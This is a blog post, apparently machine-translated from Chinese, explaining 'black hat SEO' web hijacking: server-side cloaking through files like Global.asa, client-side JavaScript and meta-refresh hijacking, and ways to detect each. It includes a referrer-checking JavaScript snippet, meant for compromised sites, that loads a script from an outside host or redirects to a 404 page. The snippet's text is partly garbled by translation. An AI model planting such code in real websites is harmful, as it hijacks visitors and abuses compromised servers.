Black Hat SEO Series Web Hijacking

Web hijacking is currently a favorite method of blackboard SEO or black production. This method often uses the website of the government and educational institutions (high weight) to modify the source code of the website, put the parasite program, and set the secondary directory. Implemented to agents, etc. Web hijacking can be divided into server hijacking, client hijacking, Baidu snapshot hijacking, Baidu search hijacking, etc.; the form of expression can be hijacking jump, or it can be hijacked web content, which is widely used in private service, gaming and other profit-making. industry.

Server hijacking

Server-side hijacking is also called global hijacking. The method is to modify the dynamic language text of the website, determine the source of the access control and return the content, and never achieve the purpose of website hijacking.

asp/aspx/php hijack

Files such as Global.asa, Global.asax, conn.asp, and conn.php are special. The function is to load the script each time a dynamic script is executed, and then execute the target script. So just write the code that determines the user’s system information in Global.asa (access source, etc.), if it is a spider access, return the keyword page (the website you want to promote), if it is a user visit, return to the normal page.

Client hijacking

There are many ways to hijack clients, but there are two main types: js hijacking and Header hijacking.

js hijack

Js hijacking purpose: Control the website jump, hide page content, window hijacking, etc. by implanting malicious js code into the target webpage.
Js implantation method: can be directly written into the source code through the intrusion server; it can also be written in the database, because some pages will present the database content.

js hijacking case

Effect: Search the click page (execute a js) through the search engine to jump to the betting page; directly enter the URL to access the web page, and jump to the 404 page.
Code:

1
2
3
4
5
6
7
8
9
10
11
today=new Date();
today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
Var Re XP=/\. (say oh enough | so | good search | Baidu | Google | have a road | Yahoo | and | dog | 118114 | v net | 360 | IO age | what | ticket) (\. Ah - at 0-9\-]+){1,2}\//IG;
var where =document.referrer;
if(regexp.test(where)){
document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>');
}
else
{
window.location.href="../../404.htm";
}

Analysis: The referer judges the way, if the referer is empty, it will jump to the 404 page. If it is the referer from the search engine, there will be a display, and then the code control jumps. If you just control the implementation to display different content, you can modify the php, asp code; if you need to hijack the search engine search box, you can write JS code to do the browser local jump. Of course, the js function can be extended indefinitely. For example, you can control the first access of a ip within one day, the rest of the access jumps, and so on.

headerHidden

Write the following code in the source code:


The Meta Refresh Tag is used to take traffic away.

Comparison of techniques

The difference between client hijacking and server

Client hijacking: The webpage code obtained from the server every time the webpage is accessed is the same, only controls the effect of the webpage code in the browser (such as whether to jump, etc.).
Server-side hijacking: Changed the webpage code obtained from the server every time you visit a webpage.

Client hijacking and server judgment method

The method of judging client hijacking: just observe the front-end code of the web page rendered by the browser to see if it references inappropriate js or other sensitive content.
Judgment method of server-side hijacking: You can observe whether the source code is different by observing the back-end code of the website, or by changing the ip, header, etc.

Conclusion: There are still many ways to hijack webpages. I know only about fur. The black hat SEO technology is very deep and the road ahead is long.

Portal

[Black Hat SEO Series] Basics
[[Black Hat SEO Series] Dark Chain] (http://thief.one/2016/10/12/%E9%BB%91%E5%B8%BDSEO%E4%B9%8B%E6%9A%97% E9%93%BE/)
[[Black Hat SEO Series] Web Hijack] (http://thief.one/2016/10/12/%E9%BB%91%E5%B8%BDSEO%E4%B9%8B%E7%BD%91% E9%A1%B5%E5%8A%AB%E6%8C%81/)
[[Black Hat SEO Series] page jump] (http://thief.one/2016/10/10/%E9%BB%91%E5%B8%BDSEO%E4%B9%8B%E9%A1%B5 %E9%9D%A2%E8%B7%B3%E8%BD%AC/)

本文标题:Black Hat SEO Series Web Hijacking

文章作者:nmask

发布时间:2016年10月12日 - 10:10

最后更新:2019年08月16日 - 15:08

原始链接:https://thief.one/2016/10/12/Black Hat SEO web hijacking/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: